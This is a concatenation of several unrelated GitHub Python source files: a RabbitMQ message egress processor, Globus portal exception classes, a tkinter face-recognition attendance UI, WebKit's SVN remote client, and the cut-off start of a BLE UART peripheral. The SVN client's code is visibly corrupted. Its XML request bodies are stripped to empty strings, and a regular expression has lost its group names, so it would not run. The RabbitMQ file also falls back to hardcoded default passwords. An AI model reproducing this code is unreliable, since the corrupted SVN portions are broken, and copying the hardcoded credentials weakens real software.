self._ack_routing_key = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.ACK_ROUTING_KEY,\r\n 'sensor-key')\r\n\r\n self._username = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.USER_NAME,\r\n 'sspluser')\r\n self._password = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.PASSWORD,\r\n 'sspl4ever')\r\n self._signature_user = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.SIGNATURE_USERNAME,\r\n 'sspl-ll')\r\n self._signature_token = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.SIGNATURE_TOKEN,\r\n 'FAKETOKEN1234')\r\n self._signature_expires = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.SIGNATURE_EXPIRES,\r\n \"3600\")\r\n self._iem_route_addr = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n self.IEM_ROUTE_ADDR,\r\n '')\r\n self._iem_route_exchange_name = self._conf_reader._get_value_with_default(self.RABBITMQPROCESSOR,\r\n 
self.IEM_ROUTE_EXCHANGE_NAME,\r\n 'sspl-in')\r\n self._rack_id = self._conf_reader._get_value_with_default(\r\n self.SYSTEM_INFORMATION, self.RACK_ID, '')\r\n\r\n self._node_id = self._conf_reader._get_value_with_default(\r\n self.SYSTEM_INFORMATION, self.NODE_ID, '')\r\n\r\n self._cluster_id = self._conf_reader._get_value_with_default(\r\n self.SYSTEM_INFORMATION, self.CLUSTER_ID, '')\r\n\r\n self._site_id = self._conf_reader._get_value_with_default(\r\n self.SYSTEM_INFORMATION, self.SITE_ID, '')\r\n\r\n\r\n if self._iem_route_addr != \"\":\r\n logger.info(\" Routing IEMs to host: %s\" % self._iem_route_addr)\r\n logger.info(\" Using IEM exchange: %s\" % self._iem_route_exchange_name)\r\n except Exception as ex:\r\n logger.exception(\"RabbitMQegressProcessor, _read_config: %r\" % ex)\r\n\r\n def _add_signature(self):\r\n \"\"\"Adds the authentication signature to the message\"\"\"\r\n self._log_debug(\"_add_signature, jsonMsg: %s\" % self._jsonMsg)\r\n self._jsonMsg[\"username\"] = self._signature_user\r\n self._jsonMsg[\"expires\"] = int(self._signature_expires)\r\n self._jsonMsg[\"time\"] = str(int(time.time()))\r\n\r\n if use_security_lib:\r\n authn_token_len = len(self._signature_token) + 1\r\n session_length = int(self._signature_expires)\r\n token = ctypes.create_string_buffer(SSPL_SEC.sspl_get_token_length())\r\n\r\n SSPL_SEC.sspl_generate_session_token(\r\n self._signature_user, authn_token_len,\r\n self._signature_token, session_length, token)\r\n\r\n # Generate the signature\r\n msg_len = len(self._jsonMsg) + 1\r\n sig = ctypes.create_string_buffer(SSPL_SEC.sspl_get_sig_length())\r\n SSPL_SEC.sspl_sign_message(msg_len, str(self._jsonMsg), self._signature_user,\r\n token, sig)\r\n\r\n self._jsonMsg[\"signature\"] = str(sig.raw)\r\n else:\r\n self._jsonMsg[\"signature\"] = \"SecurityLibNotInstalled\"\r\n\r\n def _transmit_msg_on_exchange(self):\r\n \"\"\"Transmit json message onto RabbitMQ exchange\"\"\"\r\n self._log_debug(\"_transmit_msg_on_exchange, jsonMsg: %s\" % self._jsonMsg)\r\n\r\n try:\r\n # Check for shut down message from sspl_ll_d and set a flag to shutdown\r\n # once our message queue is empty\r\n if self._jsonMsg.get(\"message\").get(\"actuator_response_type\") is not None and \\\r\n self._jsonMsg.get(\"message\").get(\"actuator_response_type\").get(\"thread_controller\") is not None and \\\r\n self._jsonMsg.get(\"message\").get(\"actuator_response_type\").get(\"thread_controller\").get(\"thread_response\") == \\\r\n \"SSPL-LL is shutting down\":\r\n logger.info(\"RabbitMQegressProcessor, _transmit_msg_on_exchange, received\" \\\r\n \"global shutdown message from sspl_ll_d\")\r\n self._request_shutdown = True\r\n\r\n msg_props = pika.BasicProperties()\r\n msg_props.content_type = \"text/plain\"\r\n\r\n # Publish json message to the correct channel\r\n # NOTE: We need to route ThreadController messages to ACK channel.\r\n # We can't modify schema as it will affect other modules too. As a\r\n # temporary solution we have added a extra check to see if actuator_response_type\r\n # is \"thread_controller\".\r\n # TODO: Find a proper way to solve this issue. 
Avoid changing\r\n # core egress processor code\r\n if self._jsonMsg.get(\"message\").get(\"actuator_response_type\") is not None and \\\r\n (self._jsonMsg.get(\"message\").get(\"actuator_response_type\").get(\"ack\") is not None or \\\r\n self._jsonMsg.get(\"message\").get(\"actuator_response_type\").get(\"thread_controller\") is not None):\r\n self._add_signature()\r\n jsonMsg = json.dumps(self._jsonMsg).encode('utf8')\r\n self._ack_connection.publish(exchange=self._exchange_name,\r\n routing_key=self._ack_routing_key,\r\n properties=msg_props,\r\n body=jsonMsg)\r\n # Routing requests for IEM msgs sent from the LoggingMsgHandler\r\n elif self._jsonMsg.get(\"message\").get(\"IEM_routing\") is not None:\r\n log_msg = self._jsonMsg.get(\"message\").get(\"IEM_routing\").get(\"log_msg\")\r\n self._log_debug(\"Routing IEM: %s\" % log_msg)\r\n if self._iem_route_addr != \"\":\r\n self._iem_connection.publish(exchange=self._iem_route_exchange_name,\r\n routing_key=self._routing_key,\r\n properties=msg_props,\r\n body=str(log_msg))\r\n else:\r\n logger.warn(\"RabbitMQegressProcessor, Attempted to route IEM without a valid 'iem_route_addr' set.\")\r\n\r\n elif self._jsonMsg.get(\"message\") is not None:\r\n message = self._jsonMsg.get(\"message\")\r\n if message.get(\"actuator_request_type\") or \\\r\n message.get(\"sensor_request_type\") is not None:\r\n logger.error(\"inside egress, test actuator\")\r\n unique_routing_key = f'{self._routing_key}_node{self._node_id}'\r\n logger.info(f\"Connecting using routing key: {unique_routing_key}\")\r\n logger.error(f\"Connecting using routing key: {unique_routing_key}\")\r\n self._add_signature()\r\n jsonMsg = json.dumps(self._jsonMsg).encode('utf8')\r\n self._connection.publish(exchange=self._exchange_name,\r\n routing_key=unique_routing_key,\r\n properties=msg_props,\r\n body=jsonMsg)\r\n\r\n else:\r\n self._add_signature()\r\n jsonMsg = json.dumps(self._jsonMsg).encode('utf8')\r\n self._connection.publish(exchange=self._exchange_name,\r\n routing_key=self._routing_key,\r\n properties=msg_props,\r\n body=jsonMsg)\r\n # No exceptions thrown so success\r\n self._log_debug(\"_transmit_msg_on_exchange, Successfully Sent: %s\" % self._jsonMsg)\r\n self._msg_sent_succesfull = True\r\n\r\n except Exception as ex:\r\n logger.exception(\"RabbitMQegressProcessor, _transmit_msg_on_exchange: %r\" % ex)\r\n self._msg_sent_succesfull = False\r\n\r\n def shutdown(self):\r\n \"\"\"Clean up scheduler queue and gracefully shutdown thread\"\"\"\r\n super(RabbitMQegressProcessor, self).shutdown()\r\n","repo_name":"ArchanaLimaye/cortx-monitor","sub_path":"sspl_test/rabbitmq/rabbitmq_egress_processor.py","file_name":"rabbitmq_egress_processor.py","file_ext":"py","file_size_in_byte":17338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11690511993","text":"\n\nclass GlobusPortalException(Exception):\n def __init__(self, code='', message='', index=''):\n \"\"\"\n :param code: A short string that can be checked against, such as\n 'PermissionDenied'\n :param message: A longer string that describes the problem and action\n that should be taken.\n \"\"\"\n self.code = code or 'UnexpectedError'\n self.message = message or (\n 'Globus Portal Framework encountered an unexpected error'\n )\n self.index = index or ''\n\n def __str__(self):\n return '{} on {}: {}'.format(self.code, self.index, self.message)\n\n def __repr__(self):\n return str(self)\n\n\nclass PortalAuthException(GlobusPortalException):\n def __init__(self, code='', 
message=''):\n self.code = code or 'PortalAuthException'\n self.message = message or 'The portal encountered an ' \\\n 'error authorizing this action'\n self.index = ''\n\n\nclass GroupsException(GlobusPortalException):\n def __init__(self, code='', message=''):\n self.code = code or 'GroupsException'\n self.message = message or 'User Globus Groups could not be fetched'\n self.index = 'Index Not Applicable'\n\n\nclass IndexNotFound(GlobusPortalException):\n \"\"\"\n Exception when user tried to access an index not defined by this portal\n \"\"\"\n def __init__(self, index, **kwargs):\n super().__init__(**kwargs)\n self.code = 'IndexNotFound'\n self.index = index\n self.message = ('The index \"{}\" was not defined for this portal'\n ''.format(index)\n )\n\n\nclass PreviewException(GlobusPortalException):\n \"\"\"\n Exceptions when trying to fetch data from Globus Preview\n \"\"\"\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.code = 'UnexpectedError'\n self.message = 'There was an unexpected error ' \\\n 'when fetching preview data.'\n\n\nclass PreviewPermissionDenied(PreviewException):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.code = 'PermissionDenied'\n self.message = 'You do not have access to view this data'\n\n\nclass PreviewURLNotFound(PreviewException):\n def __init__(self, subject, **kwargs):\n super().__init__(**kwargs)\n self.code = 'URLNotFound'\n self.message = 'No Globus HTTP URL was provided for this search ' \\\n 'entry'\n self.subject = subject\n\n\nclass PreviewNotFound(PreviewException):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.code = 'NotFound'\n self.message = 'Could not find file on the preview server'\n\n\nclass PreviewServerError(PreviewException):\n def __init__(self, http_code, server_error, **kwargs):\n super().__init__(**kwargs)\n self.code = 'ServerError'\n self.message = 'There was a problem with the Preview Server'\n self.http_code = http_code\n self.server_error = server_error\n\n def __str__(self):\n return '{}\\nHttpCode: {}\\nServer Text: {}'.format(super().__str__(),\n self.http_code,\n self.server_error)\n\n\nclass PreviewBinaryData(PreviewException):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.code = 'BinaryData'\n self.message = 'Preview is unable to display binary data.'\n\n\nclass ExpiredGlobusToken(GlobusPortalException):\n def __init__(self, token_name='', **kwargs):\n super().__init__(**kwargs)\n \"\"\"\n :param token_name: Name of Globus Token\n \"\"\"\n self.code = 'ExpiredGlobusToken'\n self.token_name = token_name\n if token_name:\n self.message = 'Your Globus Token has expired: \"{}\"' \\\n ''.format(token_name)\n else:\n self.message = 'Your Globus Token has expired.'\n\n\nclass InvalidRangeFilter(GlobusPortalException):\n def __init__(self, code='', message=''):\n \"\"\"\n :param code: A short string that can be checked against, such as\n 'PermissionDenied'\n :param message: A longer string that describes the problem and action\n that should be taken.\n \"\"\"\n super().__init__()\n self.code = code or 'RangeFilterError'\n self.message = message or 'Invalid Range Encountered'\n\n def __str__(self):\n return '{}: {}'.format(self.code, self.message)\n\n def __repr__(self):\n return str(self)\n","repo_name":"globus/django-globus-portal-framework","sub_path":"globus_portal_framework/exc.py","file_name":"exc.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} 
+{"seq_id":"36854601195","text":"from tkinter import *\n# from tkinter import ttk\nfrom PIL import Image, ImageTk\n\n\nclass FaceRecSys:\n\n def __init__(self, root):\n self.root = root\n self.root.geometry('1530x790+0+0')\n self.root.title('Face Recognition Student Attendance System')\n root.resizable(0, 0)\n root.attributes('-alpha', 0.95)\n\n # Background Image\n imgBg = Image.open(\n r\"images\\colorBg.png\")\n imgBg = imgBg.resize((1530, 790), Image.ANTIALIAS)\n self.PhoImgBg = ImageTk.PhotoImage(imgBg)\n\n BgImg = Label(self.root, image=self.PhoImgBg)\n BgImg.place(x=0, y=0, width=1530, height=790)\n\n titleLabel = Label(text=\"Student Attendance System\",\n font=(\"Calibri Light\", 30,),\n bg='#E8F0F2', fg='black')\n\n titleLabel.place(x=0, y=120, width=1530, height=50)\n\n # Making buttons for 'Student Details', 'Face Detector', 'Train Data', 'Attendance', 'Photos', 'Exit'\n\n # Student detail button\n studenButton = Image.open(r\"images\\StudentButton.jpg\")\n studenButton = studenButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgStdBtn = ImageTk.PhotoImage(studenButton)\n\n Btn1 = Button(BgImg, image=self.PhoImgStdBtn, cursor='hand2')\n Btn1.place(x=200, y=220, width=130, height=130)\n\n Btn1 = Button(BgImg, text='Student details', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn1.place(x=200, y=320, width=129, height=30)\n\n # Face Detect Button\n faceDetectButton = Image.open(r\"images\\facedetect.PNG\")\n faceDetectButton = faceDetectButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgFacDetBtn = ImageTk.PhotoImage(faceDetectButton)\n\n Btn2 = Button(BgImg, image=self.PhoImgFacDetBtn, cursor='hand2')\n Btn2.place(x=450, y=220, width=130, height=130)\n\n Btn2 = Button(BgImg, text='Detect face', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn2.place(x=450, y=320, width=129, height=30)\n\n # Attendance Button\n AttendanceButton = Image.open(r\"images\\attendance1.PNG\")\n AttendanceButton = AttendanceButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgAttendBtn = ImageTk.PhotoImage(AttendanceButton)\n\n Btn3 = Button(BgImg, image=self.PhoImgAttendBtn, cursor='hand2')\n Btn3.place(x=700, y=220, width=130, height=130)\n\n Btn3 = Button(BgImg, text='Attendance', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn3.place(x=700, y=320, width=129, height=30)\n\n # Help desk button\n\n HelpDskButton = Image.open(r\"images\\helpdesk.PNG\")\n HelpDskButton = HelpDskButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgHelpdskBtn = ImageTk.PhotoImage(HelpDskButton)\n\n Btn4 = Button(BgImg, image=self.PhoImgHelpdskBtn, cursor='hand2')\n Btn4.place(x=950, y=220, width=130, height=130)\n\n Btn4 = Button(BgImg, text='Help desk', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn4.place(x=950, y=320, width=129, height=30)\n\n #Train data Button\n\n TrainFacButton = Image.open(r\"images\\train data.PNG\")\n TrainFacButton = TrainFacButton.resize((130, 130), Image.ANTIALIAS)\n self.PhoImgTrainFacBtn = ImageTk.PhotoImage(TrainFacButton)\n\n Btn5 = Button(BgImg, image=self.PhoImgTrainFacBtn, cursor='hand2')\n Btn5.place(x=1200, y=220, width=130, height=130)\n\n Btn5 = Button(BgImg, text='Train data', cursor='hand2',\n font=(\"Calibri\", 12, 'bold',),\n bg='black', fg='white')\n Btn5.place(x=1200, y=320, width=129, height=30)\n\nif __name__ == \"__main__\":\n root = Tk() # root is needed to call by toolkit (tk)\n obj = FaceRecSys(root)\n 
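# Editor's note (added commentary, not in the original file): Pillow 10 removed Image.ANTIALIAS,\n # so on current Pillow the resize() calls above would need its drop-in replacement,\n # e.g. imgBg.resize((1530, 790), Image.LANCZOS).\n 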
root.mainloop()\n","repo_name":"Sabit-Bin-Hamid/cse299-frsas","sub_path":"tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11344846916","text":"import bisect\nimport calendar\nimport json\nimport os\nimport re\nimport tempfile\n\nfrom datetime import datetime\n\nfrom webkitcorepy import decorators, string_utils, CallByNeed\nfrom webkitscmpy.remote.scm import Scm\nfrom webkitscmpy import Commit, Version\n\nrequests = CallByNeed(lambda: __import__('requests'))\nxmltodict = CallByNeed(lambda: __import__('xmltodict'))\n\n\nclass Svn(Scm):\n URL_RE = re.compile(r'\\Ahttps?://svn.(?P\\S+)/repository/\\S+\\Z')\n DATA_RE = re.compile(br'<[SD]:(?P\\S+)>(?P.*)')\n CACHE_VERSION = Version(1)\n\n @classmethod\n def is_webserver(cls, url):\n return True if cls.URL_RE.match(url) else False\n\n def __init__(self, url, dev_branches=None, prod_branches=None, contributors=None, id=None, cache_path=None, classifier=None):\n if url[-1] != '/':\n url += '/'\n if not self.is_webserver(url):\n raise self.Exception(\"'{}' is not a valid SVN webserver\".format(url))\n\n super(Svn, self).__init__(\n url,\n dev_branches=dev_branches, prod_branches=prod_branches,\n contributors=contributors,\n id=id or url.split('/')[-2].lower(),\n classifier=classifier,\n )\n\n if not cache_path:\n from webkitscmpy.mocks import remote\n host = 'svn.{}'.format(self.URL_RE.match(self.url).group('host'))\n if host in remote.Svn.remotes:\n host = 'mock-{}'.format(host)\n cache_path = os.path.join(tempfile.gettempdir(), host, 'webkitscmpy-cache.json')\n self._cache_path = cache_path\n\n if os.path.exists(self._cache_path):\n try:\n with self._cache_lock(), open(self._cache_path) as file:\n self._metadata_cache = json.load(file)\n except BaseException:\n self._metadata_cache = dict(version=str(self.CACHE_VERSION))\n else:\n self._metadata_cache = dict(version=str(self.CACHE_VERSION))\n\n @property\n def is_svn(self):\n return True\n\n def checkout_url(self, ssh=False, http=False):\n if ssh:\n raise ValueError('Subversion does not support an ssh checkout')\n return '{}{}'.format(self.url, self.default_branch)\n\n @decorators.Memoize(timeout=60)\n def _latest(self):\n response = requests.request(\n method='OPTIONS',\n url=self.url,\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '\\n'\n ' \\n'\n '\\n',\n )\n if response.status_code != 200:\n return None\n return int(response.headers.get('SVN-Youngest-Rev'))\n\n @decorators.Memoize(cached=False)\n def info(self, branch=None, revision=None, tag=None):\n if tag and branch:\n raise ValueError('Cannot specify both branch and tag')\n if tag and revision:\n raise ValueError('Cannot specify both branch and tag')\n\n if not revision:\n branch = branch or self.default_branch\n revision = self._latest()\n if not revision:\n return None\n\n if not revision:\n raise ValueError('Failed to find the latest revision')\n\n url = '{}!svn/rvr/{}'.format(self.url, revision)\n if branch and branch != self.default_branch and '/' not in branch:\n url = '{}/branches/{}'.format(url, branch)\n elif tag:\n url = '{}/tags/{}'.format(url, tag)\n elif branch:\n url = '{}/{}'.format(url, branch or self.default_branch)\n\n response = requests.request(\n method='PROPFIND',\n url=url,\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n ' \\n'\n ' \\n'\n ' \\n'\n ' 
\\n'\n ' \\n'\n ' \\n'\n ' \\n'\n ' \\n'\n '\\n',\n )\n if response.status_code not in [200, 207]:\n return {}\n\n response = xmltodict.parse(response.text)\n response = response.get('D:multistatus', response).get('D:response', [])\n if not response:\n return {}\n\n response = response[0] if isinstance(response, list) else response\n response = response['D:propstat'][0]['D:prop']\n\n return {\n 'Last Changed Rev': response['lp1:version-name'],\n 'Last Changed Author': response.get('lp1:creator-displayname'),\n 'Last Changed Date': ' '.join(response['lp1:creationdate'].split('T')).split('.')[0],\n 'Revision': revision,\n }\n\n @property\n def default_branch(self):\n return 'trunk'\n\n def list(self, category):\n revision = self._latest()\n if not revision:\n return []\n\n response = requests.request(\n method='PROPFIND',\n url='{}!svn/rvr/{}/{}'.format(self.url, revision, category),\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '\\n'\n ' \\n'\n '\\n',\n )\n if response.status_code not in [200, 207]:\n return []\n\n responses = xmltodict.parse(response.text)\n responses = responses.get('D:multistatus', responses).get('D:response', [])\n\n results = []\n for response in responses:\n candidate = response['D:href'].split('!svn/rvr/{}/{}/'.format(revision, category))[-1].rstrip('/')\n if not candidate:\n continue\n results.append(candidate)\n\n return results\n\n @property\n def branches(self):\n return [self.default_branch] + self.list('branches')\n\n def tags(self):\n return self.list('tags')\n\n def _cache_lock(self):\n import fasteners\n return fasteners.InterProcessLock(os.path.join(os.path.dirname(self._cache_path), 'cache.lock'))\n\n def _cache_revisions(self, branch=None):\n branch = branch or self.default_branch\n is_default_branch = branch == self.default_branch\n if branch not in self._metadata_cache:\n self._metadata_cache[branch] = [0] if is_default_branch else []\n pos = len(self._metadata_cache[branch])\n\n # If we aren't on the default branch, we will need the default branch to determine when\n # our branch intersects with the default branch.\n if not is_default_branch:\n self._cache_revisions(branch=self.default_branch)\n\n did_warn = False\n count = 0\n\n latest = self._latest()\n with requests.request(\n method='REPORT',\n url='{}!svn/rvr/{}/{}'.format(\n self.url,\n latest,\n branch if is_default_branch or '/' in branch else 'branches/{}'.format(branch),\n ), stream=True,\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '{revision}\\n'\n '0\\n'\n '\\n'\n '\\n'.format(revision=latest),\n ) as response:\n if response.status_code != 200:\n raise self.Exception(\"Failed to construct branch history for '{}'\".format(branch))\n\n default_count = 0\n for line in response.iter_lines():\n match = self.DATA_RE.match(line)\n if not match or match.group('tag') != b'version-name':\n continue\n\n if not did_warn:\n count += 1\n if count > 1000:\n self.log('Caching commit data for {}, this will take a few minutes...'.format(branch))\n did_warn = True\n\n revision = int(match.group('content'))\n if pos > 0 and self._metadata_cache[branch][pos - 1] == revision:\n break\n if not is_default_branch:\n if revision in self._metadata_cache[self.default_branch]:\n # Only handle 2 sequential cross-branch commits\n if default_count > 2:\n break\n default_count += 1\n else:\n default_count = 0\n self._metadata_cache[branch].insert(pos, revision)\n\n if default_count:\n 
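# Editor's note (interpretive comment, not in the original file): the walk above stops once it\n # hits a run of revisions already cached for the default branch; the slice below appears to trim\n # that overlap so element 0 of the per-branch cache is the branch point itself.\n 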
self._metadata_cache[branch] = self._metadata_cache[branch][default_count - 1:]\n if self._metadata_cache[self.default_branch][0] == [0]:\n self._metadata_cache['identifier'] = len(self._metadata_cache[branch])\n\n try:\n if not os.path.isdir(os.path.dirname(self._cache_path)):\n os.makedirs(os.path.dirname(self._cache_path))\n with self._cache_lock(), open(self._cache_path, 'w') as file:\n json.dump(self._metadata_cache, file, indent=4)\n except (IOError, OSError):\n self.log(\"Failed to write SVN cache to '{}'\".format(self._cache_path))\n\n return self._metadata_cache[branch]\n\n def _branch_for(self, revision):\n response = requests.request(\n method='REPORT',\n url='{}!svn/rvr/{}'.format(self.url, revision),\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '{revision}\\n'\n '{revision}\\n'\n '1\\n'\n '\\n'\n '\\n'.format(revision=revision),\n )\n\n # If we didn't get a valid answer from the remote, but we found a matching candidate, we return that.\n # This is a bit risky because there is a chance the branch we have cached is not the canonical branch\n # for a revision, but this is pretty unlikely because it would require the n + 1 level branch to be cached\n # but not the n level branch.\n if response.status_code != 200:\n raise self.Exception(\"Failed to retrieve branch for '{}'\".format(revision))\n\n partial = None\n items = xmltodict.parse(response.text)['S:log-report']['S:log-item']\n for group in (items.get('S:modified-path', []), items.get('S:added-path', []), items.get('S:deleted-path', [])):\n for item in group if isinstance(group, list) else [group]:\n if not partial:\n partial = item['#text']\n while not item['#text'].startswith(partial):\n partial = partial[:-1]\n\n candidate = partial.split('/')[2 if partial.startswith('/branches') else 1]\n\n # Tags are a unique case for SVN, because they're treated as branches in native SVN\n if candidate == 'tags':\n return partial[1:].rstrip('/')\n return candidate\n\n def _commit_count(self, revision=None, branch=None):\n branch = branch or self.default_branch\n\n if revision:\n if revision not in self._metadata_cache[branch]:\n raise self.Exception(\"Failed to find '{}' on '{}'\".format(revision, branch))\n return bisect.bisect_left(self._metadata_cache[branch], int(revision))\n if branch == self.default_branch:\n return len(self._metadata_cache[branch])\n return self._commit_count(revision=self._metadata_cache[branch][0], branch=self.default_branch)\n\n def commit(self, hash=None, revision=None, identifier=None, branch=None, tag=None, include_log=True, include_identifier=True):\n if hash:\n raise ValueError('SVN does not support Git hashes')\n\n parsed_branch_point = None\n if identifier is not None:\n if revision:\n raise ValueError('Cannot define both revision and identifier')\n if tag:\n raise ValueError('Cannot define both tag and identifier')\n\n parsed_branch_point, identifier, parsed_branch = Commit._parse_identifier(identifier, do_assert=True)\n if parsed_branch:\n if branch and branch != parsed_branch:\n raise ValueError(\n \"Caller passed both 'branch' and 'identifier', but specified different branches ({} and {})\".format(\n branch, parsed_branch,\n ),\n )\n branch = parsed_branch\n branch = branch or self.default_branch\n\n if branch == self.default_branch and parsed_branch_point:\n raise self.Exception('Cannot provide a branch point for a commit on the default branch')\n\n if not self._metadata_cache.get(branch, []) or identifier >= 
len(self._metadata_cache.get(branch, [])):\n if branch != self.default_branch:\n self._cache_revisions(branch=self.default_branch)\n self._cache_revisions(branch=branch)\n if identifier > len(self._metadata_cache.get(branch, [])):\n raise self.Exception('Identifier {} cannot be found on the specified branch in the current checkout'.format(identifier))\n\n if identifier <= 0:\n if branch == self.default_branch:\n raise self.Exception('Illegal negative identifier on the default branch')\n identifier = self._commit_count(branch=branch) + identifier\n if identifier < 0:\n raise self.Exception('Identifier does not exist on the specified branch')\n\n branch = self.default_branch\n\n revision = self._metadata_cache[branch][identifier]\n info = self.info(cached=True, branch=branch, revision=revision)\n branch = self._branch_for(revision)\n if not self._metadata_cache.get(branch, []) or identifier >= len(self._metadata_cache.get(branch, [])):\n self._cache_revisions(branch=branch)\n\n elif revision:\n if branch:\n raise ValueError('Cannot define both branch and revision')\n if tag:\n raise ValueError('Cannot define both tag and revision')\n revision = Commit._parse_revision(revision, do_assert=True)\n branch = self._branch_for(revision) or self.default_branch\n info = self.info(cached=True, branch=branch, revision=revision)\n\n else:\n if branch and tag:\n raise ValueError('Cannot define both branch and tag')\n\n branch = None if tag else branch or self.default_branch\n info = self.info(tag=tag) if tag else self.info(branch=branch)\n if not info:\n raise self.Exception(\"'{}' is not a recognized {}\".format(\n tag or branch,\n 'tag' if tag else 'branch',\n ))\n revision = int(info['Last Changed Rev'])\n if branch != self.default_branch:\n branch = self._branch_for(revision)\n\n date = datetime.strptime(info['Last Changed Date'], '%Y-%m-%d %H:%M:%S') if info.get('Last Changed Date') else None\n\n if include_identifier and not identifier:\n if branch != self.default_branch and revision > self._metadata_cache.get(self.default_branch, [0])[-1]:\n self._cache_revisions(branch=self.default_branch)\n if revision not in self._metadata_cache.get(branch, []):\n self._cache_revisions(branch=branch)\n identifier = self._commit_count(revision=revision, branch=branch)\n\n branch_point = None if not include_identifier or branch == self.default_branch else self._commit_count(branch=branch)\n if branch_point and parsed_branch_point and branch_point != parsed_branch_point:\n raise ValueError(\"Provided 'branch_point' does not match branch point of specified branch\")\n\n response = requests.request(\n method='REPORT',\n url='{}!svn/rvr/{}'.format(self.url, revision),\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '{revision}\\n'\n '{revision}\\n'\n '1\\n'\n '\\n'.format(revision=revision),\n ) if include_log else None\n\n if response and response.status_code == 200:\n response = xmltodict.parse(response.text)\n response = response.get('S:log-report', {}).get('S:log-item')\n\n name = response.get('D:creator-displayname')\n message = response.get('D:comment', None)\n\n else:\n if include_log:\n self.log('Failed to connect to remote, cannot compute commit message')\n message = None\n name = info.get('Last Changed Author')\n\n author = self.contributors.create(name, name) if name and '@' in name else self.contributors.create(name)\n\n return Commit(\n repository_id=self.id,\n revision=int(revision),\n branch=branch,\n identifier=identifier if include_identifier 
else None,\n branch_point=branch_point,\n timestamp=int(calendar.timegm(date.timetuple())) if date else None,\n author=author,\n message=message,\n )\n\n def _args_from_content(self, content, include_log=True):\n xml = xmltodict.parse(content)\n date = datetime.strptime(string_utils.decode(xml['S:log-item']['S:date']).split('.')[0], '%Y-%m-%dT%H:%M:%S')\n name = string_utils.decode(xml['S:log-item']['D:creator-displayname'])\n\n return dict(\n revision=int(xml['S:log-item']['D:version-name']),\n author=self.contributors.create(name, name) if name and '@' in name else self.contributors.create(name),\n timestamp=int(calendar.timegm(date.timetuple())),\n message=string_utils.decode(xml['S:log-item']['D:comment']) if include_log else None,\n )\n\n def commits(self, begin=None, end=None, include_log=True, include_identifier=True):\n begin, end = self._commit_range(begin=begin, end=end, include_identifier=include_identifier)\n previous = end\n\n content = b''\n with requests.request(\n method='REPORT',\n url='{}!svn/rvr/{}/{}'.format(\n self.url,\n end.revision,\n end.branch if end.branch == self.default_branch or '/' in end.branch else 'branches/{}'.format(end.branch),\n ), stream=True,\n headers={\n 'Content-Type': 'text/xml',\n 'Accept-Encoding': 'gzip',\n 'DEPTH': '1',\n }, data='\\n'\n '{end}\\n'\n '{begin}\\n'\n '\\n'\n '\\n'.format(end=end.revision, begin=begin.revision),\n ) as response:\n if response.status_code != 200:\n raise self.Exception(\"Failed to construct branch history for '{}'\".format(branch))\n for line in response.iter_lines():\n if line == b'':\n content = line + b'\\n'\n else:\n content += line + b'\\n'\n if line != b'':\n continue\n\n args = self._args_from_content(content, include_log=include_log)\n\n branch_point = previous.branch_point if include_identifier else None\n identifier = previous.identifier if include_identifier else None\n if args['revision'] != previous.revision:\n identifier -= 1\n if not identifier:\n identifier = branch_point\n branch_point = None\n\n previous = Commit(\n repository_id=self.id,\n branch=end.branch if branch_point else self.default_branch,\n identifier=identifier,\n branch_point=branch_point,\n **args\n )\n yield previous\n content = b''\n","repo_name":"WebKit/WebKit","sub_path":"Tools/Scripts/libraries/webkitscmpy/webkitscmpy/remote/svn.py","file_name":"svn.py","file_ext":"py","file_size_in_byte":21478,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"23153285344","text":"# Blepy module\nimport blepy\n\n\nclass UARTPeripheral(blepy.Peripheral):\n # Using single-element list to reference immutable object 'tx_obj':\n tx_obj = [None]\n \n def __init__(self, adapter_address):\n services = [UARTService(True, self.tx_obj)]\n super().__init__(services, adapter_address, local_name='BLE UART')\n\n\nclass UARTService(blepy.Service):\n UART_SERVICE = '6E400001-B5A3-F393-E0A9-E50E24DCCA9E'\n \n def __init__(self, primary, tx_obj):\n super().__init__(self.UART_SERVICE, primary) \n self.characteristics = [\n UARTCharacteristics.RX(tx_obj),\n UARTCharacteristics.TX(tx_obj)\n ]\n \n\nclass UARTCharacteristics:\n class RX(blepy.Characteristic):\n 